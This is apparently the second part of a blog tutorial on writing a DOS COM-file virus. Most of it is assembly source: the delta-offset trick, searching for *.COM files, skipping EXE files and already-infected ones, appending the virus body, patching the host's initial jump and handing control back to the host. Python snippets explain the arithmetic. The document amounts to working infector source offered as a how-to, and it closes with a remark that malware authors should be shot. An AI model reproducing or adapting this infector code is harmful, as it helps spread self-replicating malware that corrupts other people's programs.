In the previous tutorial we looked at the basics of writing a COM infector and the different interrupts for writing to the screen in DOS. If you missed part one take a moment to go back and read it! In part two we’ll be diving into the actual virus body itself.
Hacking the Gibson.
Before we can continue we need to solve a very old problem faced by malware authors: “how to access variables if my code is running at an unknown offset?”. In a normal program we can simply access our data like so:
    szString db "Our string",0,"$"

    mov ah, 9                   ; Request write to screen
    mov dx, offset szString     ; Our string offset
    int 21h                     ; Execute
However, our virus is not running from 100h like a normal program, as it is appended to the end of our host program. The offsets the assembler baked in no longer match where the data actually sits, so any attempt to access variables in this manner will read or write the wrong memory. Best case scenario: the program crashes back to command.com. Worst case scenario: the entire system hangs.
In order to avoid this issue we need to employ something known as the Delta Offset trick. How it works is quite simple: at run-time we make a call to a label at our current position. When a CALL executes, the return address (the address of the instruction right after the CALL, which here is the label itself) is pushed onto the stack. We can then pop this value off the stack and subtract the assembled offset of the label from it. The difference is how far our code has moved from where the assembler expected it to be.
Here’s what it looks like in code (as a macro):
    @GetDeltaOffset MACRO Reg
        LOCAL GetIPCall
        call GetIPCall
    GetIPCall:
        pop Reg
        sub Reg, offset GetIPCall
    ENDM
And here’s how to call it:
@GetDeltaOffset bp ; The BP register now contains our offset
Now when we want to reference our variables we can do so using BP:
    mov cx, 1                   ; Print with CRLF
    lea si, [bp+szString]       ; Now we can correctly locate our vars
    call Printf                 ; Our print function from the previous tutorial
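The arithmetic behind the trick is easier to see with concrete numbers. The following is only a small Python model of the 16-bit subtraction, not DOS code. The addresses (`LABEL`, `VAR`, and the 400h shift) are made-up values for illustration, and the function names are hypothetical.

```python
def delta_offset(runtime_label_address: int, assembled_label_offset: int) -> int:
    """Model of: call L / L: pop reg / sub reg, offset L (16-bit wraparound)."""
    return (runtime_label_address - assembled_label_offset) & 0xFFFF


def effective_address(delta: int, assembled_var_offset: int) -> int:
    """Model of: lea si, [bp+var] where bp holds the delta offset."""
    return (delta + assembled_var_offset) & 0xFFFF


# Hypothetical offsets chosen for illustration (assembled with ORG 100h)
LABEL = 0x0106   # where the assembler placed GetIPCall
VAR = 0x0150     # where the assembler placed szString

# Running at the assembled position: the popped address equals the label offset
standalone_delta = delta_offset(0x0106, LABEL)

# Running 400h bytes further up in memory: the popped address is shifted too
relocated_delta = delta_offset(0x0506, LABEL)

print(hex(standalone_delta), hex(relocated_delta))
print(hex(effective_address(relocated_delta, VAR)))
```

When the code has not moved the delta is zero, so `[bp+var]` is the same as the plain offset. When the code has moved, every variable reference is corrected by the same amount.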
Finding some friends to play with
We can’t do anything fun unless we can find some files to mess with. So we’re going to have to look into our interrupts documentation and see how to access the file system.
Find First File (int 21h, function 4Eh) looks like a winner. It takes two parameters: the file attribute and an ASCIIZ (zero-terminated) string for the search pattern. Before calling this function we need to save the pointer to the system’s Data Transfer Area (DTA) and point DOS at a buffer of our own. By default the DTA sits at offset 80h in the PSP, the same place as the program’s command tail, so failing to do this will result in the loss of the command tail (that’s bad).
    OldDTA dw 2 dup(?)          ; Pointer to old DTA
    NewDTA db 2bh dup(?)        ; Our allocated memory for new DTA (43 bytes)

    mov ah, 2fh
    int 21h                     ; Get current DTA (returned in ES:BX)
    mov word ptr [bp+OldDTA], es    ; Store old address
    mov word ptr [bp+OldDTA+2], bx

    ; Now we have the old DTA we can set our new one
    mov ah, 1ah
    lea dx, [bp+NewDTA]         ; Our DTA buffer
    int 21h                     ; Set DTA
Now we can finally call our find function to locate our target!
    szTarget db "*.COM",0

    mov ah, 4eh                 ; Find first matching file
    mov cx, 20h                 ; Attribute
    lea dx, [bp+szTarget]
    int 21h
    jc EXIT                     ; If the carry flag is set the call failed

    mov cx, 1
    lea si, [bp+NewDTA+1eh]     ; Pointer to filename (offset 1Eh in our DTA)
    call Printf                 ; Print to screen
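The 1Eh offset used for the filename comes from the layout DOS fills in after a successful Find First call. As a rough illustration, here is a Python sketch that decodes a 43-byte buffer using the commonly documented layout (attribute at 15h, time at 16h, date at 18h, size at 1Ah, ASCIIZ name at 1Eh). The function name and the sample buffer are made up for the example.

```python
import struct

DTA_SIZE = 0x2B  # 43 bytes, matching the NewDTA buffer


def parse_find_dta(dta: bytes) -> dict:
    """Decode the fields DOS writes into the DTA after Find First/Next."""
    if len(dta) < DTA_SIZE:
        raise ValueError("DTA buffer must be at least 43 bytes")
    attribute = dta[0x15]
    # Little-endian: time (word), date (word), size (dword) starting at 16h
    time, date, size = struct.unpack_from("<HHI", dta, 0x16)
    # The name is a zero-terminated 8.3 string in a 13-byte field at 1Eh
    name = dta[0x1E:0x1E + 13].split(b"\x00", 1)[0].decode("ascii")
    return {"attribute": attribute, "time": time, "date": date,
            "size": size, "name": name}


# Build a fake DTA by hand (values are illustrative only)
sample = bytearray(DTA_SIZE)
sample[0x15] = 0x20                              # archive attribute
struct.pack_into("<HHI", sample, 0x16, 0, 0, 1234)
sample[0x1E:0x1E + 9] = b"HOST.COM\x00"

info = parse_find_dta(bytes(sample))
print(info["name"], info["size"])
```

The field widths add up to exactly 43 bytes (1Eh + 13), which is where the 2bh buffer size comes from.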
The Infection Routine
Now that we’ve located a file we can insert our viral payload into it. Previously I talked about how COM files typically have either a short JMP (EB XX) or a near JMP (E9 XX XX) at the start of the file. We’re going to write our code to the end of the file then update this JMP instruction with the address of our entry point.
But before we can do that we need to check two things:
- We’ve actually found a valid COM File (sometimes EXE files are renamed to COM files).
- We haven’t infected this file previously.
So first we read some data from the file:
    hFile dw ?                  ; File handle
    OldHeader db 5 dup(?)       ; Buffer for data

    mov ax, 3d02h
    lea dx, [bp+NewDTA+1eh]     ; Pointer to our filename
    int 21h                     ; Open file
    jc FAIL                     ; We were unable to open the file

    ; ax now contains our file handle
    mov word ptr [bp+hFile], ax

    xor ax, ax
    mov ah, 3fh                 ; Read file
    mov bx, word ptr [bp+hFile] ; File Handle
    mov cx, 5h                  ; Bytes to read
    lea dx, [bp+OldHeader]      ; Buffer to read into
    int 21h
    cmp ax, 5h                  ; Did we get all the data? (AX = bytes read)
    jb FAIL                     ; Read failed, exit
Now we need to check for the MZ signature that marks a DOS EXE header:
    xchg di, dx                 ; Swap data between di, dx (DI now points at OldHeader)
    mov ax, 5a4dh               ; Check for MZ signature (M -> 4Dh, Z -> 5Ah)
    cmp ax, [di]
    je FAIL                     ; File is an EXE
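The constant in the comparison is 5A4Dh rather than 4D5Ah because x86 reads words in little-endian order: the first byte in the file ('M', 4Dh) ends up in the low half of the register. A quick Python check of that byte ordering, with hypothetical helper names and made-up sample headers:

```python
import struct


def first_word(header: bytes) -> int:
    """Read the first two bytes as a little-endian 16-bit word, like cmp ax, [di]."""
    return struct.unpack_from("<H", header, 0)[0]


def looks_like_exe(header: bytes) -> bool:
    """True if the header starts with the 'MZ' signature."""
    return len(header) >= 2 and first_word(header) == 0x5A4D


exe_header = b"MZ\x90\x00\x03"      # starts with 4Dh 5Ah
com_header = b"\xE9\x10\x00t\x00"   # starts with a near JMP

print(hex(first_word(exe_header)))
print(looks_like_exe(exe_header), looks_like_exe(com_header))
```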
Next we check for our infection marker. Since we’re using a near JMP (E9 XX XX), the first 3 bytes of the program are taken, so we’ll write our marker to the 4th byte. This may cause some minor corruption to the host program, but every COM file I tested continued to run normally. There are better ways to do this, however this was the most common method of the day.
The rationale for this may have been that disk cycles were expensive. Reading from the start of the file would be significantly faster than reading from the end (especially on a floppy disk). So this may have been why malware authors at the time opted for this quicker (albeit more destructive) method.
    VirusSignature db 't'

    xor ax, ax                              ; Zero register
    mov al, byte ptr [bp+VirusSignature]    ; Move signature to AL
    cmp al, byte ptr [di+3]                 ; Zero-based index 3 (4th byte)
    je FAIL                                 ; File is already infected
Adding our payload
Now that all the safety checks are completed we can append our code.
    mov ax, 4202h               ; Move pointer to end of file
    mov bx, word ptr [bp+hFile] ; File handle
    xor cx, cx                  ; Zero registers
    xor dx, dx
    int 21h
    jc CLOSE_FILE               ; If it failed close the file
Now we need to calculate our new JMP and place our infection marker:
    NewJmp db 0E9h,0,0,0

    ; Continuing from the seek to end of file
    ; ax is our offset (the length of the host file)
    sub ax, 3
    mov word ptr [bp+NewJmp+1h], ax

    ; Append our infection marker
    mov al, byte ptr [bp+VirusSignature]
    mov byte ptr [bp+NewJmp+3h], al

    ; Append virus code
    mov ah, 40h
    mov bx, word ptr [bp+hFile]
    lea dx, [bp+START]
    mov cx, offset END_OF_CODE - offset START
    int 21h
    jc CLOSE_FILE               ; Failed jump to close file

    mov ax, 4200h               ; Goto beginning of file
    mov bx, word ptr [bp+hFile]
    xor cx, cx
    xor dx, dx
    int 21h
    jc CLOSE_FILE               ; Failed jump to close file

    mov ah, 40h
    mov bx, word ptr [bp+hFile] ; File handle
    lea dx, [bp+NewJmp]         ; JMP instruction
    mov cx, 4h                  ; Num bytes to write
    int 21h                     ; Write to file
    jmp CLOSE_FILE
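The `sub ax, 3` deserves a word of explanation. A near JMP (E9) stores a 16-bit displacement measured from the address of the instruction that follows it, and the JMP itself is 3 bytes long. The Python sketch below only models that displacement arithmetic; the file length is a made-up value and the function names are hypothetical.

```python
LOAD_BASE = 0x100   # COM programs are loaded at offset 100h
JMP_LEN = 3         # E9 plus a 16-bit displacement


def near_jmp_displacement(target: int, jmp_address: int = LOAD_BASE) -> int:
    """Displacement for E9 rel16: relative to the end of the JMP instruction."""
    return (target - (jmp_address + JMP_LEN)) & 0xFFFF


def encode_near_jmp(displacement: int) -> bytes:
    """E9 followed by the displacement in little-endian order."""
    return bytes([0xE9]) + displacement.to_bytes(2, "little")


file_length = 0x0200                  # hypothetical length in bytes
target = LOAD_BASE + file_length      # first byte past the original file in memory
disp = near_jmp_displacement(target)

print(hex(disp), encode_near_jmp(disp).hex())
```

Because the JMP sits at 100h and the file is loaded at 100h, the two bases cancel out and the displacement works out to the file length minus 3.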
Once we’re done we can close the file and continue:
    CLOSE_FILE:
        mov ah, 3eh                 ; Close file
        mov bx, word ptr [bp+hFile] ; File Handle
        int 21h
You’re probably wondering about the offsets used in the size calculation. It’s quite simple: you just need to design your skeleton program like so:
    CODE_SEG SEGMENT
        ASSUME CS:CODE_SEG
        ORG 100H

    START:
        jmp MAIN

    MAIN:
        ; Virus start

    EXIT:
        mov ah, 4ch
        int 21h

    END_OF_CODE:

    CODE_SEG ENDS
    END START
Make sense? Good.
Returning control to host
At the moment our virus is almost complete. We just need to do one more thing: return control to the host. The typical DOS way is to call int 20h, however this doesn’t work as expected under DOSBox (or I couldn’t get it to work anyhow). So I ended up coding my own solution to the problem.
When we jump to EXIT we can check the BP register (BP is holding our Delta Offset). If BP is non-zero our code is running inside a host program; if it’s zero we’re running as a normal program at our assembled offsets and we can exit normally.
So we can add a little check on our exit label:
    cmp bp, 0h
    jne EXIT_HOST               ; We're inside a host program

    ; Otherwise quit normally
    mov ah, 4ch
    int 21h
Now for my creative method of exiting and returning control: scanning for an entry point. When I was picking apart COM files I noticed that the jump at the start of the program always landed on the same four bytes. Now this may not be the case for every COM file, but lacking any detailed documentation or a large number of COM files to test with it seemed pretty safe.
    ; We're searching for these bytes
    ; 0A 24 B4 09

        mov cx, 100h            ; Set loop counter max
        mov bx, 1               ; Set counter to 1

    l1:
        ; Move the first two bytes + bx into ax
        ; Remember our program is loaded into 100h
        mov ax, word ptr cs:[100h + bx]
        cmp ax, 240ah           ; Compare with 0A 24
        jne fail                ; Not found continue

        ; First match succeeded
        ; Check next pair
        mov ax, word ptr cs:[100h + bx + 2h]
        cmp ax, 09b4h           ; Compare with B4 09
        je found                ; Found both? Jump to end

    fail:
        inc bx                  ; Increment the counter
        cmp bx, cx              ; Check against loop max
        jl l1
        ; Note: if nothing matched we fall through to found with bx = cx

    found:
        mov ax, bx              ; Move offset into ax
        dec ax                  ; Adjust pointer by one
        ; Update the jump at the start of our program
        mov word ptr cs:[101h], ax
        mov ax, 100h            ; Set ax to equal program start

        ; Also don't forget to restore the original DTA
        ; Remember to return registers to
        ; their original values before jumping back

        ; Since we change the value in memory
        ; When we jump to 100h, now we'll jump to the
        ; Original program start
        jmp ax
So simply put we scan our program’s memory from the start looking for 0A 24 B4 09 which indicates an entry point. Once we’ve found it we update our jump in memory to point to the new address (original program start) then we jump back to the start of the file.
If we did this correctly once our program is done the original program will execute like nothing happened. You just need to make sure you return the registers to their original state before jumping back or weirdness may occur.
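To see why the listing stores `bx - 1` at 101h, it helps to trace the numbers by hand. The Python model below mimics the scan over a made-up memory image (index 0 stands for address 100h) and works out where the patched JMP would land. The image contents and function names are assumptions for illustration only.

```python
PATTERN = bytes([0x0A, 0x24, 0xB4, 0x09])
LOAD_BASE = 0x100


def scan_for_pattern(image: bytes, limit: int = 0x100):
    """Return bx (offset from 100h) of the first match for bx = 1..limit-1, else None."""
    for bx in range(1, limit):
        if image[bx:bx + 4] == PATTERN:
            return bx
    return None


def jump_target_after_patch(bx: int) -> int:
    """Address reached by the JMP at 100h once bx - 1 is stored at 101h."""
    displacement = bx - 1
    return LOAD_BASE + 3 + displacement   # rel16 counts from the end of the JMP


# Hypothetical program: JMP, a short string ending in 0Ah '$', then B4 09 ...
image = b"\xE9\x05\x00" + b"Hi\r\n$" + b"\xB4\x09\xBA\x03\x01\xCD\x21"

bx = scan_for_pattern(image)
target = jump_target_after_patch(bx)
print(bx, hex(target), hex(image[target - LOAD_BASE]))
```

In this example the jump lands two bytes past the start of the match, on the B4 09 pair (which decodes as `mov ah, 9`), so the 0A 24 in front of it looks like the tail of a '$'-terminated string rather than code. Unlike the listing, this model returns `None` when nothing matches instead of carrying on with the loop maximum.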
In conclusion that’s one way you can write a DOS COM Infector. Some things to note:
- You’ve probably noticed in the picture above that the ‘t’ has been replaced with ‘z’. I was using ‘z’ as my infection marker and it overwrote the first letter of the string in my test program.
- A better method would be to store some type of string inside the virus payload and scan for that since we don’t have a performance penalty in DOSBox.
- I am not an expert at assembler and do not claim to be an expert at DOS. There are probably some bugs in my code, or places where it’s lacking. This is fine; this was just a fun experiment for me.
- My entry point scan method is a hack to work on DOSBox. I wanted to get some of the ‘classic’ methods to work but wasn’t able to. I’m not sure if this is due to DOSBox itself or my lack of knowledge on the subject.
- I had intended to write a Terminate Stay Resident virus but I simply ran out of time.
- Finally DO NOT contact me asking for help on writing malware. I’m not interested and I think malware authors should be shot on sight.
I had a lot of fun learning and writing this; it was a great time. I’ve never been so frustrated and captivated by a project quite like this. It’s also made me fall in love with programming in assembler again (there’s something liberating about throwing away a big clunky IDE and just having a terminal and some man pages open).
I plan to return to DOSBox in the future for more shenanigans but that’s it for now.